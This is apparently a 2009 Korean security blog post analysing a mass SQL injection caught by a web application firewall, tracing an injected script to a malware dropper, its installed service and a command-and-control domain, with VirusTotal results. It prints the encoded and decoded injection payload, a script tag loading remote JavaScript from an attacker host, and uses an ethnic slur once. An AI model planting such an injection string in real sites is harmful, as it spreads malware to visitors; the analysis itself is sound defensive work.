0x02 analysis2009. 5. 5. 02:37

오랜만에 글 써봅니다. ^^; 
그 동안 잠심 다른 업무를 좀 하느라...
그럼 몇일전 WAF에서 발견된 악성스크립트 분석해보겠습니다.

MASS SQL Injection을 시도가 있었고 로그를 분석한 결과 삽입될 URL부분만 인코딩되어 있었습니다.

 %3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%76%61%76%61%74%69%6F%6E%2E%35
 %39%34%34%76%2E%6E%65%74%2F%62%62%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E

인코딩된 부분을 디코딩하면 다음과 같습니다.

 <script src="hxxp://vavation.5944v.net/bb.js"></script>


위 도메인은 처음보는 도메인인데 앞으로 어떤 추이가 나올지 궁금합니다.

일단 bb.js를 열어보면 같은 위치에서 bb.htm 파일을 iframe으로 삽입시켰습니다. 당연히 width와 height는 0입니다.




bb.htm에서 약간 이상한 부분이 있었습니다.
다른 사람이 확인했을 때는 분명 실행파일에 대한 링크가 있었는데 제가 확인했을 땐 없었습니다.
제가 확인한 페이지는 이렇습니다.




js.users.51.la/2618220.js를 불러 오기는 하는데 특별한 내용은 없었습니다만 js.user.51.la라는 도메인은 악성코드 유포로 유명했던 도메인이라 조금 꺼림직하긴 합니다.

먼저 분석했던 직원에 의해 발견된 bb.htm에서는 hxxp://vavation.5944v.net/1.exe 을 포함하고 있었습니다. 아마도 제가 뭔가 잘못한게 아닌가 생각되지만 어디서 어떻게 잘못한건지 감을 못 잡고 있습니다. -_-;;
그래서 그냥 직접 받아 보았습니다. 파일 속성만 살펴보아도 짱개 프로그램이라는게 눈에 확 들어옵니다.




Winalysis로 스냅샷 찍고 파일을 실행해보았습니다.
파일이 2개, 레지스트리 여러개, 서비스 1개가 변경되었습니다. 그 중에서 레지스트리를 보시면




파일 2개는 drivers 폴더에 대한 변경 하나와 C:\WINDOWS\Systear.exe 두개입니다. 이 파일이 SYS라는 서비스를 실행하는 파일입니다.
그런데 확인 결과 서비스가 실행되지는 않은 것처럼 보이는데 실제로는 서비스가 실행되지 않은게 아니라
서비스를 실행시키면 Systear.exe가 실행되고 이 파일이 svchost.exe를 실행시키고 특정 도메인으로 접속하게 만듭니다.
그리고 Systear.exe 프로세스는 사라지고 서비스에서도 시작되지 않은 것처럼 보이는 것이죠.

파일 실행시 패킷을 떠보니 11826.rhelper.com으로 질의를 한 후 1600번 포트로 연결을 합니다.




1번에서 11826.rhelper.com으로 질의해서 222.131.44.225를 받아오고
2번에서 222.131.44.225로 3-way handshaking을 거쳐 접속을 합니다.
그리고 3번에서 서로 어떤 데이터를 주고 받습니다.

보여드리고 싶었는데...pcap 파일을 날려 먹었습니다. -_-;;
현재는 연결이 안되고 있습니다. ㅜ.ㅜ
pcap 데이터 확보되면 수정하겠습니다.


rhelper.com으로 구글에서 검색한 결과 다수의 악성코드들이 존재하는 것을 확인할 수 있었습니다.
19167.rhelper.com  63540.rhelper.com  62869.rhelper.com  등등 여러가지 있습니다.

악성코드가 실행된 후 11826.rhelper.com으로 연결하는걸로 봐서는 11826.rhelper.com 도메인이
공격자가 좀비들에게 명령을 내리는 C&C 서버일 가능성이 높아 보입니다.

추가적인 위험성이 존재할 수 있기 때문에 위에서 살펴 보았던
vavation.5944v.net과 11826.rhelper.com 도메인은 차단하는 것이 좋을 듯 합니다.


그리고 현재시간으로 VIRUSTOTAL에서 확인 결과 V3에서는 잡고 있지만 nProtect나 Virobot, BitDefender(알약에서 사용하는 엔진) 등은 해당 악성코드를 잡아내지 못하고 있다. 본인은 AntiVir를 사용하고 있는데 AntiVir는 잘 잡아내고 있다.


안티바이러스 엔진 버전 정의 날짜 검사 결과
a-squared 4.0.0.101 2009.05.04 Trojan.Crypt!IK
AhnLab-V3 5.0.0.2 2009.05.04 Win-Trojan/Xema.variant
AntiVir 7.9.0.160 2009.05.04 TR/Crypt.ZPACK.Gen
Antiy-AVL 2.0.3.1 2009.04.30 -
Authentium 5.1.2.4 2009.05.04 W32/Fujack.U
Avast 4.8.1335.0 2009.05.04 -
AVG 8.5.0.327 2009.05.04 Win32/Heur
BitDefender 7.2 2009.05.04 -
CAT-QuickHeal 10.00 2009.05.04 -
ClamAV 0.94.1 2009.05.04 -
Comodo 1149 2009.05.03 -
DrWeb 4.44.0.09170 2009.05.04 -
eSafe 7.0.17.0 2009.05.03 Win32.TRCrypt.ZPACK
eTrust-Vet 31.6.6488 2009.05.04 -
F-Prot 4.4.4.56 2009.05.04 W32/Fujack.U
F-Secure 8.0.14470.0 2009.05.04 -
Fortinet 3.117.0.0 2009.05.04 PossibleThreat
GData 19 2009.05.04 -
Ikarus T3.1.1.49.0 2009.05.04 Trojan.Crypt
K7AntiVirus 7.10.723 2009.05.04 Trojan.Win32.Malware.1
Kaspersky 7.0.0.125 2009.05.04 -
McAfee 5605 2009.05.04 New Malware.ix
McAfee+Artemis 5605 2009.05.04 Artemis!2046A24FF3F8
McAfee-GW-Edition 6.7.6 2009.05.04 Trojan.Crypt.ZPACK.Gen
Microsoft 1.4602 2009.05.04 -
NOD32 4052 2009.05.04 Win32/Fujacks
Norman 6.01.05 2009.05.04 Fujack.T
nProtect 2009.1.8.0 2009.05.04 -
Panda 10.0.0.14 2009.05.04 Suspicious file
PCTools 4.4.2.0 2009.05.03 -
Prevx1 3.0 2009.05.04 -
Rising 21.28.04.00 2009.05.04 -
Sophos 4.41.0 2009.05.04 Mal/UnkPack-Fam
Sunbelt 3.2.1858.2 2009.05.03 -
Symantec 1.4.4.12 2009.05.04 -
TheHacker 6.3.4.1.318 2009.05.04 -
TrendMicro 8.950.0.1092 2009.05.04 -
VBA32 3.12.10.4 2009.05.04 -
ViRobot 2009.5.4.1719 2009.05.04 -
VirusBuster 4.6.5.0 2009.05.04 -


 


내일은...아니 오늘은 어린이날이군요...
아들래미랑 신나게 놓아줘야겠군요...
아침에 좀 늦게 일어날 듯 하지만요...^^;

앞으로는 자주 포스팅할 수 있도록 노력하겠습니다.




Posted by demantos